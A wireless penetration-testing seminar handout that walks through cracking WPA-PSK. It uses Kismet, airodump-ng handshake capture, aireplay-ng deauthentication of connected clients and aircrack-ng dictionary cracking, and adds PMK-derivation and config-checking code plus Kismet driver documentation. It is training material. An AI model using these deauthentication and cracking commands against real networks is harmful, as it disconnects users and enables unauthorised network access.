Wireless Penetration Testing: Cracking WPA-PSK

Security Seminar by:
Edward Brian Drumheller Jr.
Joseph Allan Krug Esquire
Justin Thomas Lewis
Preparation

For this seminar we are using a bootable Linux CD-ROM distribution, BackTrack 3 Beta (14-12-2007). This is a fully operational operating system that boots from a CD. To follow along you will need a CD burner and a blank CD-R or CD-RW disc to burn the image file to. Go to http://www.remote-exploit.org/backtrack_download.html to find the image file on the various mirror websites. Once you have the image (the file is 700 MB, so it can take a while to download), burn it to a CD. If you do not have a program that can burn an ISO image, download one such as http://cdburnerxp.se/

Once finished, shut your computer down and restart. You may need to go into your BIOS to change the default boot order so that the CD-ROM boots before your hard drive. Pay attention when your system first boots: there should be a prompt for the BIOS, often called "setup". Inside it, find where you can change the boot order, commonly under "boot". Save the settings and exit.

Your system should now restart.
If prompted, press any key to boot the live disc.
When asked, boot into the KDE option.
Once the desktop loads, follow these directions:

Open a terminal window and run the command
    wget http://eddrumheller.com/pen/word.lst
This file is downloaded to your home directory and is used later (it is the dictionary file for the final cracking step).
Cracking WPA-PSK

1. Open a terminal window and run the command
       iwconfig

2. Write down the interface that has wireless extensions.

3. Make sure the mode of the card is set to Monitor.
   a. If the mode is set to Managed, run the command
          iwconfig <wirelessAdapter> mode monitor

4. Open the Kismet configuration file by running the command
       vi /usr/local/etc/kismet.conf
   Change line 27 from
       # source=none,none,addme
   to
       source=<kismetDriver>,<wirelessAdapter>,<wireless>
   (the first field is the Kismet source type for your card's driver; see the Kismet capture sources documentation below). Then run Kismet with the command
       kismet
   in the terminal. Startup messages scroll by, and then Kismet's text-mode interface appears in the terminal.
   a. Press h to view the help menu.
   b. Press x to close any pop-up menu.
   c. Press s to bring up the sort menu.
   d. Press b to sort by BSSID.
   e. Highlight the network named "dd-wrt".
   f. Press Enter to view its information.
   g. Write down the BSSID and channel number.
   h. Close the Kismet terminal window (mandatory: Kismet keeps hopping channels, which would interfere with the capture in the next step).

5. Open a new terminal and type the command
       airodump-ng -c <channel of AP> --bssid <AP's bssid> -w capture eth0
   a. Leave this window open; this program captures the handshake.

6. Open another terminal and type
       aireplay-ng -0 5 -a <AP's bssid> -c <client's bssid> eth0
   to send de-authentication packets to a client that is already authenticated to the AP (the -c value is that client's MAC address). The client reconnects and performs the handshake again, which is what airodump-ng records.

7. View the aireplay-ng and airodump-ng terminals side by side. If the injection worked, "WPA handshake: <BSSID>" is displayed in the upper right-hand corner of airodump-ng.
   a. The capture containing the handshake is now stored in your home directory (the files matching capture*.cap).

8. Crack the handshake with aircrack-ng using the command
       aircrack-ng -w <location of a dictionary file> -b <AP's bssid> capture*.cap
   Note: the key is displayed once it is found. The word.lst file downloaded during preparation can be used as the dictionary file.

Directions to connect to an AP secured with WPA in BackTrack 2

To connect to WPA, a little work is needed:
* Creating a .conf file
* Running the script

Creating the .conf file:
Open your favourite editor and add the following:
    network={
        ssid="youraccesspointname"
        psk="youraccesspointspassword"
    }
Save this in /root as wpa.conf

Running the script:
First run this command (change eth0 to your adaptor)
    wpa_supplicant -i eth0 -c wpa.conf
    -i  specifies which interface to use
    -c  specifies the location of the .conf file
This should print a message stating that the connection has been successful.
It is important not to close this shell. Open another shell and type (again, change eth0 to your adaptor)
    dhcpcd eth0
Test the connection.
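The psk= value in wpa.conf and the dictionary step of aircrack-ng meet in one computation: the 802.11i derivation of the Pairwise Master Key from the passphrase and SSID. The following is an added example, not code from the handout, wpa_supplicant or aircrack-ng; the function names are mine, the "dd-wrt" SSID is the handout's, and the passphrase "correct horse battery staple" is a made-up sample. It derives the PMK, writes the handout's wpa.conf block with the 64-hex PMK instead of the cleartext passphrase, and measures what one dictionary guess costs on the local CPU.

```python
# Added example (not from the handout): how a WPA-PSK passphrase becomes the
# 256-bit Pairwise Master Key (PMK) per IEEE 802.11i, which is the computation
# wpa_supplicant does for psk="..." and aircrack-ng repeats for every word in
# the dictionary of step 8.
import hashlib
import time


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA passphrase is 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def wpa_conf_with_pmk(ssid: str, passphrase: str) -> str:
    """The wpa.conf network block from the handout, but with the 64-hex PMK
    in psk= (unquoted) instead of the cleartext passphrase; wpa_supplicant
    accepts both forms, and this keeps the passphrase itself off the disk."""
    return ('network={\n'
            f'\tssid="{ssid}"\n'
            f'\tpsk={wpa_pmk(passphrase, ssid).hex()}\n'
            '}\n')


def derivations_per_second(ssid: str, samples: int = 50) -> float:
    """Measure PMK derivations per second on this CPU. Each dictionary word
    costs one derivation, so the 4096 iterations are what makes a large
    wordlist slow and a long random passphrase impractical to guess."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"sample-passphrase-{i}", ssid)
    return samples / (time.perf_counter() - start)


def seconds_to_try(wordlist_size: int, rate: float) -> float:
    """Time to run a wordlist of the given size at the measured rate."""
    return wordlist_size / rate


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE".
    print(wpa_pmk("password", "IEEE").hex())
    # Constructed sample: the handout's "dd-wrt" network with a made-up passphrase.
    print(wpa_conf_with_pmk("dd-wrt", "correct horse battery staple"))
    rate = derivations_per_second("dd-wrt")
    hours = seconds_to_try(10_000_000, rate) / 3600
    print(f"{rate:.0f} PMK/s here; a 10 million word list takes about {hours:.1f} h")
```

The PMK printed for "password"/"IEEE" must match the published 802.11i test vector, which is a quick way to confirm a PSK implementation before trusting it.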
KISMET Documentation

12. Capture Sources

A capture source in Kismet is anything which provides packets to the Kismet engine. Capture sources define the underlying engine needed to capture data from the interface, how to change channel, and how to enter rfmon mode. It is necessary to tell Kismet what specific type of card you use because different drivers often use different methods to report information and enter monitor mode.
Source type     Cards                 OS           Driver
--------------- --------------------- ------------ -------------------------
acx100          TI ACX100             Linux        ACX100
                http://acx100.sourceforge.net/
                ACX100 drivers handle the 22mbit cards branded by D-Link and
                others.

admtek          ADMTek                Linux        ADMTek
                http://www.latinsud.com/adm8211/ (Patches)
                http://aluminum.sourmilk.net/adm8211/ (GPL driver)
                ADMTek drivers used in many consumer 802.11b cards. With the
                patches above, quasi-rfmon is possible - these cards appear
                to be almost entirely software controlled and always in a
                rfmon-like state. This card WILL BROADCAST while in rfmon,
                rendering the sniffer visible.
                The fully GPL drivers are supported, in addition to the hacks
                to the non-free drivers.

airpcap         Airpcap USB           cygwin       CACE Tech
                http://www.cacetech.com/products/airpcap.htm
                The CACE AirPcap USB device allows native capture on
                Win32/Cygwin.
                The explicit airpcap source expects the Win32/Cygwin interface
                name. This should be used once the source is identified via
                airpcap_ask or if multiple simultaneous sources are required.

airpcap_ask     Airpcap USB           cygwin       CACE Tech
                http://www.cacetech.com/products/airpcap.htm
                The CACE AirPcap USB device allows native capture on
                Win32/Cygwin.
                The airpcap_ask source lists available airpcap devices and
                allows the user to pick interactively. The 'capture interface'
                field is irrelevant and can be filled with any value (for
                example, 'dummy').

atmel_usb       Atmel-USB             Linux        Berlios-Atmel
                http://at76c503a.berlios.de/
                These drivers work ONLY on USB cards (Sorry, no PCMCIA
                support). Monitor mode support is limited and "faked" by
                bypassing part of the firmware and parsing packets directly,
                and is likely to not report all of the frames.
                This card MAY BROADCAST while in rfmon, rendering the sniffer
                visible.
                It appears that this card may be only formatting the beacons
                as an 802.11 stream, which means you likely will not see data
                frames, rendering most IDS functions, IP discovery, and data
                logging unavailable.

ath5k           Atheros               Linux        Kernel/Madwifi
                http://madwifi.org
                Based on the OpenBSD OpenHAL, the Ath5k drivers are the future
                of Atheros support and will be mainlined into the Linux
                kernel.

ath5k_a         Atheros               Linux        Kernel/Madwifi
                http://madwifi.org
                Ath5k source for 11a only.

ath5k_ag        Atheros               Linux        Kernel/Madwifi
                http://madwifi.org
                Ath5k source for 11a/11g.

bcm43xx         Broadcom              Linux        BCM43XX
                http://bcm43xx.berlios.de, kernel
                Linux native broadcom drivers incorporated into modern
                kernels.

b43             Broadcom              Linux
                B43 broadcom drivers for current Broadcom devices in Linux
                kernels.

b43legacy       Broadcom              Linux
                B43 broadcom drivers for legacy Broadcom devices in Linux
                kernels.

cisco           Aironet 340,350       Linux        Kernel 2.4.10 - 2.4.19
                Standard Cisco cards in Linux. Works only with the Linux
                kernel drivers, not the drivers found in pcmcia-cs.
                The drivers found on the cisco.com site can be patched with
                the files from the Kismet download site to add monitor mode
                with channel control, HOWEVER these drivers are extremely
                buggy for normal use and work only with the 2.4 kernel tree.
                The cisco drivers currently do not enter rfmon mode correctly,
                so channel control is not available. The firmware will hop to
                whatever channel it feels like hopping to, when it feels like
                hopping.

cisco_wifix     Aironet 340,350       Linux        Kernel 2.4.20+, CVS
                http://sourceforge.net/projects/airo-linux/
                Capture interface: 'ethX:wifiX'
                Kernel 2.4.20+ and CVS drivers use ethX for normal mode and
                wifiX for monitor mode. Kismet needs to know both devices,
                which may not necessarily be the same number, for example
                'eth1:wifi0'.
                Linux kernel 2.4.20 and 2.4.21 have highly unstable cisco
                drivers and should be avoided.
                The cisco drivers currently do not enter rfmon mode correctly,
                so channel control is not available. The firmware will hop to
                whatever channel it feels like hopping to, when it feels like
                hopping.

darwin          OSX native cards      OSX/Darwin   OSX
                Supports both Broadcom and Atheros Airport-Extreme cards.
                When using a Broadcom based card, it may be necessary to
                enable rfmon on the device for the first time using another
                program.
                When using an Atheros based card, 802.11a may also be
                supported by adding a 'sourcechannels' line to kismet.conf.

hostap          Prism/2               Linux        HostAP 0.4
                http://hostap.epitest.fi/
                HostAP drivers drive the Prism/2 chipset in access point mode,
                but also can drive the cards in client and monitor modes. The
                HostAP drivers seem to change how they go into monitor mode
                fairly often, but this source should manage to get them going.

ipw2100         Intel/Centrino        Linux        ipw2100-0.44+
                http://ipw2100.sourceforge.net/
                The Linux IPW2100/Centrino drivers for 802.11b cards now
                support rfmon, so here's support for them. They act more or
                less like any other wireless interface would.

ipw2200         Intel/Centrino        Linux        ipw2200-1.0.4+
                http://ipw2200.sourceforge.net/
                The Linux IPW2200/Centrino drivers for 802.11bg cards support
                rfmon as of 1.0.4 and firmware 2.3.
                Signal level reporting requires radiotap be turned on in the
                makefile while compiling the driver. Noise levels are not
                reported.

ipw2915         Intel/Centrino        Linux        ipw2200-1.0.4+
                http://ipw2200.sourceforge.net/
                The Linux IPW2200/Centrino drivers for 802.11bga cards support
                rfmon as of 1.0.4 and firmware 2.3.
                This is the same as ipw2200 but defaults to scanning the
                802.11a channel range in addition to 802.11b/g.
                Signal level reporting requires radiotap be turned on in the
                makefile while compiling the driver. Noise levels are not
                reported.

ipw3945         Intel/Centrino        Linux        ipw3945
                http://ipw3945.sourceforge.net/
                The Linux IPW3945/Centrino drivers for Intel Core 802.11bga
                cards.

ipwlivetap      Intel/Centrino        Linux        ipw2200/3945
                http://ipw2200.sourceforge.net/
                http://ipw3945.sourceforge.net/
                The ipw3945 and patched ipw2200 drivers support a special mode
                which allows monitor-mode style sniffing while remaining
                associated. Channel hopping is not possible, as the card is
                still associated to a specific AP, but single-channel IDS and
                sniffing can be accomplished. See the ipw driver mailing list
                archives for information about patching your drivers.

iwl3945         Intel/Centrino        Linux        iwl3945
                Intel's new IPW drivers using the mac80211 kernel layer.

iwl4965         Intel/Centrino        Linux        iwl4965
                Intel's new IPW drivers using the mac80211 kernel layer.

kismet_drone    n/a                   Any          n/a
                Capture interface: 'dronehost:port'
                The remote drone capture source connects to a Kismet drone and
                processes the packets. Refer to the Remote Drone section of
                the README for more details about how to set up a drone.

madwifi_a       Atheros               Linux        madwifi
                http://sourceforge.net/projects/madwifi/
                Capture interface: 'athX'
                Capture interface: 'wifiX' (Madwifi-NG)
                Madwifi drivers in 802.11a-only mode.
                When using madwifi-ng, be sure all non-monitor VAPs have been
                removed, otherwise madwifi will not properly report most
                traffic.

madwifi_b       Atheros               Linux        madwifi
                http://sourceforge.net/projects/madwifi/
                Capture interface: 'athX'
                Capture interface: 'wifiX' (Madwifi-NG)
                Madwifi drivers in 802.11b-only mode.
                When using madwifi-ng, be sure all non-monitor VAPs have been
                removed, otherwise madwifi will not properly report most
                traffic.

madwifi_g       Atheros               Linux        madwifi
                http://sourceforge.net/projects/madwifi/
                Capture interface: 'athX'
                Capture interface: 'wifiX' (Madwifi-NG)
                Madwifi drivers in 802.11g-only mode. This will, obviously,
                also see 11b networks.
                When using madwifi-ng, be sure all non-monitor VAPs have been
                removed, otherwise madwifi will not properly report most
                traffic.

madwifi_ab      Atheros               Linux        madwifi
                http://sourceforge.net/projects/madwifi/
                Capture interface: 'athX'
                Capture interface: 'wifiX' (Madwifi-NG)
                Madwifi drivers in 802.11a and 802.11b combo mode. This will
                seamlessly switch between bands during channel hopping.
                When using madwifi-ng, be sure all non-monitor VAPs have been
                removed, otherwise madwifi will not properly report most
                traffic.

madwifi_ag      Atheros               Linux        madwifi
                http://sourceforge.net/projects/madwifi/
                Capture interface: 'athX'
                Capture interface: 'wifiX' (Madwifi-NG)
                Madwifi drivers in 802.11a and 802.11g combo mode. This will
                seamlessly switch between bands during channel hopping.
                When using madwifi-ng, be sure all non-monitor VAPs have been
                removed, otherwise madwifi will not properly report most
                traffic.

madwifing_a     Atheros               Linux        madwifi-ng
madwifing_ab    Atheros               Linux        madwifi-ng
madwifing_ag    Atheros               Linux        madwifi-ng
madwifing_g     Atheros               Linux        madwifi-ng
madwifing_b     Atheros               Linux        madwifi-ng
                http://sourceforge.net/projects/madwifi/
                Capture interface: 'wifiX'
                *Deprecated*. Detection for madwifi-ng is built into the
                standard madwifi sources. The _ng source names have been kept
                to allow old configs to continue functioning.

nokia770        Nokia/TI              Linux        Nokia/TI
                http://maemo.org/
                Nokia770 capture interface. Includes support for validating
                frame checksums to screen out junk packets, since the drivers
                pass us all data.

orinoco         Lucent, Orinoco       Linux        Patched orinoco_cs
                http://airsnort.shmoo.com/orinocoinfo.html
                The Orinoco drivers which have mainlined into the Linux kernel
                do support monitor mode, however only specific firmware
                versions are supported and often they do not work.
                An up-ported version of the older Orinoco drivers which more
                reliably supported rfmon may be available at:
                http://www.projectiwear.org/~plasmahh/orinoco.html
                Generally, Orinoco cards are not recommended for use with
                Kismet due to these limitations.

orinoco_14      Lucent, Orinoco       Linux        Orinoco 0.14+
                https://savannah.nongnu.org/projects/orinoco/
                This source is deprecated and should only be used with
                pre-release versions of a driver since merged into the Linux
                kernel.

pcapfile        n/a                   Any          n/a
                Capture interface: '/path/to/file'
                The pcapfile capture source feeds a stored 802.11-encap dump
                file through the Kismet engine again. This can be useful for
                debugging or rescanning old logs for alert conditions.
                Pcapfile sources are only available if Kismet was compiled
                with libpcap support.

prism2_openbsd  Prism/2               OpenBSD      Kernel
                Full support for Prism2 under OpenBSD.

prism54g        PrismGT               Linux        prism54
                http://www.prism54.org
                PrismGT 802.11g drivers supporting monitor mode.

radiotap_bsd_ab Radiotap              BSD          Kernel
                Dual-band cards with radiotap headers.

radiotap_bsd_a  Radiotap              BSD          Kernel
                802.11a cards (or dual-band on 11a channels only) with
                radiotap headers.

radiotap_bsd_b  Radiotap              BSD          Kernel
                802.11b/g cards (or dual-band on 11b channels only) with
                radiotap headers.

rt2400          Ralink 2400 11b       Linux        rt2400-gpl
                http://rt2x00.serialmonkey.com/
                Ralink 2400 802.11b cards using the serialmonkey GPL'd rt2x00
                drivers. Must use 1.2.2 beta 2 or newer drivers.

rt2500          Ralink 2500 11g       Linux        rt2500-gpl
                http://rt2x00.serialmonkey.com/
                Ralink 2500 802.11g cards using the serialmonkey GPL'd rt2x00
                drivers. Must use 1.1.0 beta 2 or newer drivers.

rt73            Ralink 73 11g         Linux        rt73-gpl-cvs
                http://rt2x00.serialmonkey.com/
                Ralink 73 802.11g USB cards using the serialmonkey GPL'd rt79
                drivers (tested only with CVS driver versions).

rt8180          Realtek 8180 11b      Linux        rtl8180-sa2400
                http://rtl8180-sa2400.sourceforge.net/
                Realtek 8180 based cards (there seem to be an awful lot of
                them) using the GPL drivers.

viha            Airport               OSX          viha
                http://www.dopesquad.net/security/
                Monitor mode support for Airport under OSX. Does not support
                Airport Extreme.

vtar5k          Atheros 802.11a       Linux        vtar5k
                http://team.vantronix.net/ar5k/
                vtar5k drivers handle some Atheros 802.11a cards. Chances are
                you'll have better luck with madwifi drivers.

wlanng_legacy   Prism/2               Linux        wlan-ng 0.1.3 and earlier
                http://www.linux-wlan.com/
                Old wlan-ng drivers didn't support pcap capturing and use a
                netlink socket to the kernel. These are still in use on some
                embedded systems (like the Zaurus).

wlanng          Prism/2               Linux        wlan-ng 0.1.4 - 0.1.9
                http://www.linux-wlan.com/
                Wlan-ng prism2 drivers prior to the AVS headers.

wlanng_avs      Prism/2               Linux        wlan-ng 0.2.0+
                http://www.linux-wlan.com/
                Newer wlan-ng drivers support a new header type and slightly
                different monitor commands to report wepped packets.

wrt54g          Linksys WRT54G        Linux        linksys
                http://seattlewireless.net/index.cgi/LinksysWrt54g
                Capture interface: 'ethX'
                Capture interface: 'ethX:prismX'
                Support for the drivers found in the embedded Linux inside the
                Linksys WRT54G (and probably other APs using the same
                firmware).
                Newer firmwares (such as OpenWRT) use the prism0 device for
                monitor mode data. On these firmwares, specify both interfaces
                (wrt54g,eth1:prism0,foo).

wsp100          NetChem WSP100        Any          n/a
                http://networkchemistry.com/
                Capture interface: 'host:port'
                The WSP100 is an embedded device which reports 802.11 packets
                over UDP. The wsp100 capture source is (generally) system
                agnostic, however over time it has been less maintained than
                others. If you'd like to send me patches for this, please let
                me know.

zd1211          ZyDAS USB             Linux        zd1211
                http://zd1211.ath.cx
                The ZD1211 drivers have had some regressions which lead to
                data corruption while changing channel. Some versions work,
                and typically the aircrack patches resolve the corruption
                issues if your version doesn't properly handle rfmon.
Chipsets known to NOT WORK:

Broadcom - No linux drivers, only useable with ndiswrapper or linuxant
           wrappers around windows drivers.
           *** UPDATE *** See the bcm43xx source type entry. There are
           experimental reverse-engineered drivers which have monitor mode
           support now under Linux! If they don't work, however, then too
           bad.

Airport Extreme - Really a Broadcom, with no rfmon in the OSX drivers.
           *** UPDATE *** See the bcm source for linux on ppc, it MAY work,
           it may not. Currently there's no solution for OSX but I'm looking
           for OSX hackers interested in redoing the Kismet port and looking
           into adding more support.

Atmel - There is a hack for pseudo-monitor in USB. There is currently no
        equivalent hack for PCMCIA.

HermesII - Proxim successor to the Orinoco/HermesI. No support yet in the
           drivers, may be available in the future.

ndiswrapper - Anything using ndiswrapper is using WINDOWS drivers AND CAN NOT
              BE USED WITH KISMET.
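The source= line edited in step 4 of the cracking walkthrough is easy to get wrong, and a bad line is only reported when Kismet starts. The following checker is an added example, not code from the handout or from Kismet; it validates the source= lines of a kismet.conf against the source types, deprecations and 'Capture interface' formats listed in the table above. The angle-bracket placeholders in the constructed sample are the ones the handout uses, and the regular expressions for the interface shapes are my reading of the table's examples.

```python
# Added example (not from the handout or from Kismet): checks the source=
# lines of kismet.conf against the capture sources table documented above.
import re
# Every source type listed in the table.
KNOWN_TYPES = set("""
acx100 admtek airpcap airpcap_ask atmel_usb ath5k ath5k_a ath5k_ag bcm43xx b43
b43legacy cisco cisco_wifix darwin hostap ipw2100 ipw2200 ipw2915 ipw3945
ipwlivetap iwl3945 iwl4965 kismet_drone madwifi_a madwifi_b madwifi_g madwifi_ab
madwifi_ag madwifing_a madwifing_ab madwifing_ag madwifing_g madwifing_b
nokia770 orinoco orinoco_14 pcapfile prism2_openbsd prism54g radiotap_bsd_ab
radiotap_bsd_a radiotap_bsd_b rt2400 rt2500 rt73 rt8180 viha vtar5k
wlanng_legacy wlanng wlanng_avs wrt54g wsp100 zd1211""".split())
# Source types the table marks as deprecated.
DEPRECATED = {"madwifing_a", "madwifing_ab", "madwifing_ag", "madwifing_g",
              "madwifing_b", "orinoco_14"}
# Source types whose 'Capture interface' field has a documented shape.
INTERFACE_FORMATS = {
    "cisco_wifix":  (r"^eth\d+:wifi\d+$", "'ethX:wifiX'"),
    "wrt54g":       (r"^eth\d+(:prism\d+)?$", "'ethX' or 'ethX:prismX'"),
    "kismet_drone": (r"^[\w.-]+:\d+$", "'dronehost:port'"),
    "wsp100":       (r"^[\w.-]+:\d+$", "'host:port'"),
}

def check_kismet_sources(conf_text: str) -> list:
    """Return a list of problems found in the source= lines (empty means OK)."""
    problems, active = [], 0
    for lineno, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.strip()
        if not line.startswith("source="):      # '# source=...' is a comment
            continue
        active += 1
        fields = [f.strip() for f in line[len("source="):].split(",")]
        if len(fields) != 3 or not all(fields):
            problems.append(f"line {lineno}: need source=<type>,<interface>,<name>")
        elif "<" in "".join(fields):              # handout placeholders left in
            problems.append(f"line {lineno}: placeholder '<...>' not replaced")
        elif fields[0] not in KNOWN_TYPES:
            problems.append(f"line {lineno}: unknown source type '{fields[0]}'")
        elif fields[0] in DEPRECATED:
            problems.append(f"line {lineno}: source type '{fields[0]}' is deprecated")
        else:
            pattern, hint = INTERFACE_FORMATS.get(fields[0], (None, None))
            if pattern and not re.match(pattern, fields[1]):
                problems.append(f"line {lineno}: {fields[0]} expects {hint}, got '{fields[1]}'")
    if not active:
        problems.append("no active source= line (the template is still commented out)")
    return problems

# Constructed sample fragment of kismet.conf, mirroring the handout's step 4.
SAMPLE_CONF = """\
# source=none,none,addme
source=madwifi_g,wifi0,madwifi
source=cisco_wifix,eth1,aironet
source=madwifing_g,wifi0,old
source=<kismetDriver>,<wirelessAdapter>,<wireless>
"""
```

Running check_kismet_sources over a real kismet.conf before starting Kismet reports the three mistakes in the sample (a cisco_wifix line without the wifiX half, a deprecated madwifing_g type, and the handout's placeholders left unedited) while accepting the madwifi_g line.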
For more detailed information about Kismet, visit kismetwireless.net/documentation.shtml